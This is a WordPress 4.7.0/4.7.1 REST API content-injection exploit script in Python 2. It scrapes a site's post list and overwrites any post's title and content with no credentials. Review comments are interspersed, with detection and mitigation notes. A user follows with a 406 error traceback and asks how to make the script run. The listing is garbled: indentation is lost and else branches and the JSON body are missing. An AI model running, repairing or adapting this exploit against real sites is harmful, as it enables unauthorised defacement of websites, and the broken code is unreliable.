Wordpress content injection exploit by snoww0lf
#! /usr/bin/env python
Technical Explanation:
REST API Wordpress reference:
Wordpress Version Affected: 4.7.0/4.7.1
2017 - Coded by snoww0lf.
import re
import json
import urllib2
# Client for a single WordPress site (Python 2: urllib2, byte strings).
# It fetches the page at `url` once, then derives from that HTML the REST API
# root, a version guess, the public post list and a post-update request.
# NOTE(review): this listing lost its indentation and several lines in
# extraction (see get_wp_version and inject_content); it is not runnable as shown.
class WpContent:
# Fetch the page body up front and keep it for the regex lookups below.
# There is no timeout and no error handling: any HTTP error status raises
# urllib2.HTTPError straight out of the constructor.
def __init__(self, url):
self.__url = url
self.__response = urllib2.urlopen(self.__url).read()
# Return the first href value captured from the fetched HTML.
# `.*` is greedy, so the capture runs to the last `'` on the matching line.
# `[0]` raises IndexError when the page has no match.
# NOTE(review): the pattern looks truncated; presumably it targeted the REST
# API discovery <link> in the page head - confirm against the original.
def get_api_wp(self):
return re.findall(r"' href='(.*)'", self.__response)[0]
# Guess the WordPress version from the first `ver=...` query string in the HTML.
# This is a markup heuristic: `ver=` on an enqueued asset can carry a plugin's
# or theme's own version, so the value is not proof of the core version.
# As shown, both notes are appended to every result because no `else:` line
# survives; presumably it was lost in extraction.
def get_wp_version(self):
check_version = re.findall(r'ver=(.*)"', self.__response)[0]
if check_version == "4.7" or check_version == "4.7.1":
check_version += " ( Maybe vulnerable to inject ) "
check_version += " ( Maybe not vulnerable to inject ) "
return check_version
# GET <api root>wp/v2/posts with no credentials and format each returned post
# (id, title, link, first 100 characters of rendered content) as text.
# Returns one concatenated string; an empty post list yields "".
def get_wp_post_information(self):
get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
load_info = json.loads(get_post)
collected_information = ""
for load in load_info:
# The fields are encoded to UTF-8 bytes because this is Python 2 str formatting.
collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
return collected_information
# Send the post-update request for post `id_content` and return the raw body.
# The request is a POST (urllib2.Request is given a data argument) and carries
# only a Content-Type header: no cookie, nonce or other credential is sent.
# Detection: the URL puts the numeric id in the path and repeats it in an `id`
# query parameter with the letters "CBF" appended. A non-numeric `id` query
# value on a wp/v2/posts/<id> route is a usable signature in access logs and
# WAF rules.
# Mitigation: upgrade WordPress past the affected releases named in the header.
def inject_content(self, id_content, title, content):
# NOTE(review): the JSON body literal is cut off on this page, so the payload
# fields are not visible here.
data = json.dumps({
# `params` is passed as the third positional argument of urllib2.Request,
# which is the request headers.
params = {'Content-Type':'application/json'}
full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
req = urllib2.Request(full_url, data, params)
resp = urllib2.urlopen(req).read()
return resp
# Interactive driver: loop prompting for a URL, show the version guess, and on
# confirmation collect the post list and send one update request per pass.
# NOTE(review): indentation and apparently several lines (`else:` branches and
# the statement that prints wp_information) were lost in extraction. The two
# "Continue ?" prompt groups at the end presumably belonged to separate branches.
def main():
print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
while True:
url = raw_input("[x] Enter the URL: ")
print("[?] Please wait ...\n")
# The constructor performs the HTTP fetch. A non-2xx status raises
# urllib2.HTTPError here and ends the program; nothing catches it.
wpcontent = WpContent(url)
# split()[0] drops the note text appended by get_wp_version and keeps the
# bare version token.
wp_version = wpcontent.get_wp_version().split()[0]
print("[x] Wordpress Version: {0} ".format(wp_version))
# Exact string match on a value scraped from markup: a heuristic, not a
# confirmation that the site is unpatched.
if(wp_version == "4.7" or wp_version == "4.7.1"):
select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
while(select != "y" and select != "n"):
print("[x] Wrong selection! Try again.")
select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
if(select == "y"):
print("[x] Parsing data information, please wait ...\n")
# The result is assigned but never used in the visible listing.
wp_information = wpcontent.get_wp_post_information()
# NOTE(review): Python 2 input() evaluates the typed text as a Python
# expression (eval of raw_input), so whatever is entered at this prompt and at
# the mode prompt below runs in the operator's own process.
# int(raw_input(...)) parses a number without evaluating code.
inp_id = input("[x] Enter ID Content that you want to overwrite: ")
inp_title = raw_input("[x] Change title: ")
print("=> 1. Load data from file.")
print("=> 2. Input data.")
mode = input("[x] Change content by [1/2] ? ")
if mode == 1:
# Read the whole local file named by the operator and use it as the content.
dfile = raw_input("[x] Enter the filename: ")
with open(dfile, 'r') as f:
readf = f.readlines()
print("[x] Exploit in progress ...\n")
wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
# As shown, the manual-input path below also runs after the file path because
# no `else:` line survives.
inp_data = raw_input("[?] Input data: ")
print("[x] Exploit in progress ...\n")
wpcontent.inject_content(inp_id, inp_title, inp_data)
# The response from inject_content is discarded, so this message is printed
# whether or not the server accepted the request.
print("[x] Update success!\n")
cont = raw_input("[?] Continue ? [y/n] ").lower()
while(cont != "y" and cont != "n"):
print("[x] Wrong selection! Try again.")
cont = raw_input("[?] Continue ? [y/n] ").lower()
if cont == "n": break
cont = raw_input("[?] Continue ? ").lower()
while(cont != "y" and cont != "n"):
print("[x] Wrong selection! Try again.")
cont = raw_input("[?] Continue ? ").lower()
if cont == "n": break
if __name__ == '__main__':

I get this

  File "", line 101, in <module>
  File "", line 55, in main
    wpcontent = WpContent(url)
  File "", line 17, in __init__
    self.__response = urllib2.urlopen(self.__url).read()
  File "/usr/lib/python2.7/", line 154, in urlopen
    return, data, timeout)
  File "/usr/lib/python2.7/", line 435, in open
    response = meth(req, response)
  File "/usr/lib/python2.7/", line 548, in http_response
    'http', request, response, code, msg, hdrs)
  File "/usr/lib/python2.7/", line 473, in error
    return self._call_chain(*args)
  File "/usr/lib/python2.7/", line 407, in _call_chain
    result = func(*args)
  File "/usr/lib/python2.7/", line 556, in http_error_default
    raise HTTPError(req.get_full_url(), code, msg, hdrs, fp)
urllib2.HTTPError: HTTP Error 406: Not Acceptable

How do I fix it?
